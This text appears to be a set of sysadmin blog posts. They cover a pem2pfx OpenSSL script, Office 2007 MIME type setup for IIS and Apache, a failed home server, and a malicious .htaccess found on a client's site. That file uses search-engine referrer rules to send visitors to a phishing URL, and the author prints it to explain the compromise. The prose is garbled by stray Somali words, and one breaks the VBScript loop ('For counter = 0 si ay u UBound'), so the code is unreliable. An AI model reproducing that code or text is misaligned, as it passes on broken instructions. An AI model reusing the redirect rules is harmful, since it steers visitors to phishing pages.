[edit] So much for that. It turns out that openssl is able to determine that the key and certificate are already in a single file. Therefore, no csplitting required (iyo sidoo kale, I hope somebody reading this at least learned about how nice csplit is). In fact, the whole script might as well be obsolete… blaargh. Well, at least it gives a nice warning about not giving a blank passphrase. 😀

Here’s the new version:

pem2pfx – converts a .pem-formatted file containing a private key and signed certificate into a Windows-compatible .pfx certificate file.

#!/bin/bash
#pem2pfx
#v0.2
#Tricky - brendan@swiftspirit.co.za
# Converts a .pem certificate file to .pfx format
# $1 is the source file
set -e
 
if [ $# = 1 ]; then
  outputfile=`echo $1 | sed 's/.pem$/.pfx/'`
 
  echo "Please specify a password below. Windows refuses to import a .pfx certificate with a blank password."
  openssl pkcs12 -export -out $outputfile -in $1
 
 else
  echo "pem2pfx - converts a .pem formatted private-key and certificate file to an IIS-compatible .pfx file."
  echo "Usage: pem2pfx inputfile.pem"
fi

more…

The relatively new document types Office 2007 has given some web hosts problems when their clients want to offer documents for download. Most often, the documents are being offered by the web server as “text/html” which is then rendered as a ton of garbage on the web user’s screen.

The best way to resolve this is to add all the MIME types to the server’s main configuration. IIS7 for Windows already has these MIME types set up correctly by default. IIS6 and IIS5 require the MIME types to be added, as might Apache on older installations. For Apache, there is also a workaround for the individual domain owner to add the mime types via Apache’s .htaccess file.

IIS 6 MIME type addition (for the Server Administrator)

Before this can be done, ensure that your server is also set to allow direct metabase editing:

1. Load IIS Manager: Start -> Run, “inetmgr” -> [OK]
2. Right click the “server” and click “Properties”
3. Within the “Internet Information Services” tab (usually the only tab), ensure that the “Enable Direct Metabase Edit” checkbox is checked.
4. Click [OK]

Be sure to back up IIS’s configuration (here for IIS5) beforehand. I won’t take any responsibility for an admin breaking his server. I have reason to believe this may also work on IIS5 however I have just as much reason to believe that it might just give lots of errors. If an IIS5 / Windows 2000 admin is willing to test this for me after backing up your configuration please let me know of the results.

Copy the following text into a file named msoff07-addmime.vbs and execute it once from the commandline by typing cscript msoff07-addmime.vbs and pressing Enter. If you run it more than once, the MIME types will be added each time and you will have multiple identical entries:

' This script adds the necessary Office 2007 MIME types to an IIS 6 Server.
' To use this script, just double-click or execute it from a command line.
' Running this script multiple times results in multiple entries in the
' IIS MimeMap so you should not run it more than once.
' Modified from http://msdn.microsoft.com/en-us/library/ms752346.aspx
 
Dim MimeMapObj, MimeMapArray, MimeTypesToAddArray, WshShell, oExec
Const ADS_PROPERTY_UPDATE = 2 
 
' Set the MIME types to be added
MimeTypesToAddArray = Array(".docm", "application/vnd.ms-word.document.macroEnabled.12", _
".docx", "application/vnd.openxmlformats-officedocument.wordprocessingml.document", _
".dotm", "application/vnd.ms-word.template.macroEnabled.12", _
".dotx", "application/vnd.openxmlformats-officedocument.wordprocessingml.template", _
".potm", "application/vnd.ms-powerpoint.template.macroEnabled.12", _
".potx", "application/vnd.openxmlformats-officedocument.presentationml.template", _
".ppam", "application/vnd.ms-powerpoint.addin.macroEnabled.12", _
".ppsm", "application/vnd.ms-powerpoint.slideshow.macroEnabled.12", _
".ppsx", "application/vnd.openxmlformats-officedocument.presentationml.slideshow", _
".pptm", "application/vnd.ms-powerpoint.presentation.macroEnabled.12", _
".pptx", "application/vnd.openxmlformats-officedocument.presentationml.presentation", _
".sldm", "application/vnd.ms-powerpoint.slide.macroEnabled.12", _
".sldx", "application/vnd.openxmlformats-officedocument.presentationml.slide", _
".xlam", "application/vnd.ms-excel.addin.macroEnabled.12", _
".xlsb", "application/vnd.ms-excel.sheet.binary.macroEnabled.12", _
".xlsm", "application/vnd.ms-excel.sheet.macroEnabled.12", _
".xlsx", "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet", _
".xltm", "application/vnd.ms-excel.template.macroEnabled.12", _
".xltx", "application/vnd.openxmlformats-officedocument.spreadsheetml.template") 
 
' Get the mimemap object
Set MimeMapObj = GetObject("IIS://LocalHost/MimeMap")
 
' Call AddMimeType for every pair of extension/MIME type
For counter = 0 si ay u UBound(MimeTypesToAddArray) Step 2
    AddMimeType MimeTypesToAddArray(counter), MimeTypesToAddArray(counter+1)
Next
 
' Create a Shell object
Set WshShell = CreateObject("WScript.Shell")
 
' Stop and Start the IIS Service
Set oExec = WshShell.Exec("net stop w3svc")
Do While oExec.Status = 0
    WScript.Sleep 100
Loop
 
Set oExec = WshShell.Exec("net start w3svc")
Do While oExec.Status = 0
    WScript.Sleep 100
Loop
 
Set oExec = Nothing
 
' Report status to user
WScript.Echo "Microsoft Office 2007 Document MIME types have been registered."
 
' AddMimeType Sub
Sub AddMimeType (Ext, MType)
 
    ' Get the mappings from the MimeMap property.
    MimeMapArray = MimeMapObj.GetEx("MimeMap") 
 
    ' Add a new mapping.
    i = UBound(MimeMapArray) + 1
    Redim Preserve MimeMapArray(i)
    Set MimeMapArray(i) = CreateObject("MimeMap")
    MimeMapArray(i).Extension = Ext
    MimeMapArray(i).MimeType = MType
    MimeMapObj.PutEx ADS_PROPERTY_UPDATE, "MimeMap", MimeMapArray
    MimeMapObj.SetInfo
 
End Sub

Apache MIME type addition (for the Server Administrator)

Apache stores its MIME types in a file normally located at $installpath/conf/mime.types. See the mod_mime documentation for more on how it works. Arch Linux installs its MIME types at /etc/httpd/conf/mime.types iyo Parallels Plesk installs it in /usr/local/psa/admin/conf/mime.types. Your distribution might have it in another place, so find your mime.types file by running locate mime.types.

Add the following lines to your mime.types file:

application/vnd.ms-word.document.macroEnabled.12                          docm
application/vnd.openxmlformats-officedocument.wordprocessingml.document   docx
application/vnd.ms-word.template.macroEnabled.12                          dotm
application/vnd.openxmlformats-officedocument.wordprocessingml.template   dotx
application/vnd.ms-powerpoint.template.macroEnabled.12                    potm
application/vnd.openxmlformats-officedocument.presentationml.template     potx
application/vnd.ms-powerpoint.addin.macroEnabled.12                       ppam
application/vnd.ms-powerpoint.slideshow.macroEnabled.12                   ppsm
application/vnd.openxmlformats-officedocument.presentationml.slideshow    ppsx
application/vnd.ms-powerpoint.presentation.macroEnabled.12                pptm
application/vnd.openxmlformats-officedocument.presentationml.presentation pptx
application/vnd.ms-powerpoint.slide.macroEnabled.12                       sldm
application/vnd.openxmlformats-officedocument.presentationml.slide        sldx
application/vnd.ms-excel.addin.macroEnabled.12                            xlam
application/vnd.ms-excel.sheet.binary.macroEnabled.12                     xlsb
application/vnd.ms-excel.sheet.macroEnabled.12                            xlsm
application/vnd.openxmlformats-officedocument.spreadsheetml.sheet         xlsx
application/vnd.ms-excel.template.macroEnabled.12                         xltm
application/vnd.openxmlformats-officedocument.spreadsheetml.template      xltx

Apache MIME type addition (For the domain owner with at least FTP access – using .htaccess file)

Add the following text to your domain’s .htaccess file, most commonly in an httpdocs/ directory

AddType application/vnd.ms-word.document.macroEnabled.12 docm
AddType application/vnd.openxmlformats-officedocument.wordprocessingml.document docx
AddType application/vnd.ms-word.template.macroEnabled.12 dotm
AddType application/vnd.openxmlformats-officedocument.wordprocessingml.template dotx
AddType application/vnd.ms-powerpoint.template.macroEnabled.12 potm
AddType application/vnd.openxmlformats-officedocument.presentationml.template potx
AddType application/vnd.ms-powerpoint.addin.macroEnabled.12 ppam
AddType application/vnd.ms-powerpoint.slideshow.macroEnabled.12 ppsm
AddType application/vnd.openxmlformats-officedocument.presentationml.slideshow ppsx
AddType application/vnd.ms-powerpoint.presentation.macroEnabled.12 pptm
AddType application/vnd.openxmlformats-officedocument.presentationml.presentation pptx
AddType application/vnd.ms-powerpoint.slide.macroEnabled.12 sldm
AddType application/vnd.openxmlformats-officedocument.presentationml.slide sldx
AddType application/vnd.ms-excel.addin.macroEnabled.12 xlam
AddType application/vnd.ms-excel.sheet.binary.macroEnabled.12 xlsb
AddType application/vnd.ms-excel.sheet.macroEnabled.12 xlsm
AddType application/vnd.openxmlformats-officedocument.spreadsheetml.sheet xlsx
AddType application/vnd.ms-excel.template.macroEnabled.12 xltm
AddType application/vnd.openxmlformats-officedocument.spreadsheetml.template xltx

Some of you may already know that I built a home server not too long ago. I documented some of the very important parts of how it was built though I was planning on releasing all the documentation all at once. I was using Arch Linux and I hadn’t nearly finished everything, especially the documentation. Tusaale ahaan, it was supposed to be a media server. After some disk shuffling, it was supposed to end up having a RAID1 for the boot and RAID 10 for the rest (the media part).

This didn’t work out at all.

I got as far as having an efficient (iyo iyo sidoo kale–firewalled) routing gateway server. I was finally satisfied that the customised local routing* was working correctly and I was confident that my tests with DHCP meant I could disable the DHCP service on the flimsy ADSL router and have all my flatmates start using the server as the Internet gateway. Instead: I was logged in to the server from the office, I’d just installed Apache2**, and I was about to consult with a colleague regarding getting nice graphs put together so the flatmates could all see who was using up the bandwidth*** — when I noticed a little message indicating that the root filesystem had been remounted read-only due to some or other disk failure.

And then I lost my connection to the server.

And then I gained a foul mood.

🙁

When I arrived home, I found that, as I had guessed from the descriptive message given at the office, the (very) old 80GB IDE disk that I was using for the root filesystem had failed. Unfortunately, the server would never boot again and there was little chance of prying everything off onto another disk to continue where I’d left off.

I’m buying a replacement (SATA) HDD this next weekend just after pay day – and I’ve changed my mind about documenting my progress… and backing up my configurations:

Release Early. Release Often.

* ISPs in South Africa charge less (easy price comparison) for “local-only” (within South Africa) traffic on ADSL but only if you use an ADSL account that CANNOT access web services outside of South Africa. This means that if you want to take advantage of the reduced costs but still be able to access the Internet at large, you need to set up some sneaky routing.

** one-command-install: ~$ yaourt -S apache

*** Internet Access in SA is expensive – you get charged about R70 ($7 / £4.9 / €5.46) per GB when using ADSL, or about R2 per MB if using GPRS / 3G.

I very recently found a problem with a client’s web site due to a .htaccess file. The site was hosted on a Windows server running IIS using IISPassword, which makes use of .htaccess files for its settings.

IISPassword doesn’t follow exactly the same rules as with Apache however. If the .htaccess file exists then it must contain IISPassword-appropriate rules, otherwise the server returns only the following error:

Here’s the content of the .htaccess file. I’ve only modified the final redirection URL to point to example.com appropriately:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://siffy-phishing-url.example.com [R,L]

If this were on a server running Apache with mod_rewrite, most web users would go directly to the correct site content. Only if they reached the site through the search engines and indexes listed in the .htaccess, would they be redirected to the siffy phishing url that the cracker wants victims to reach.

Dabcan, the cracker (or perhaps even an automated worm) didn’t realise that the server in question didn’t even support these mod_rewrite rules. But either way, this is very worrying as I can foresee many arguments about whether or not the site is working…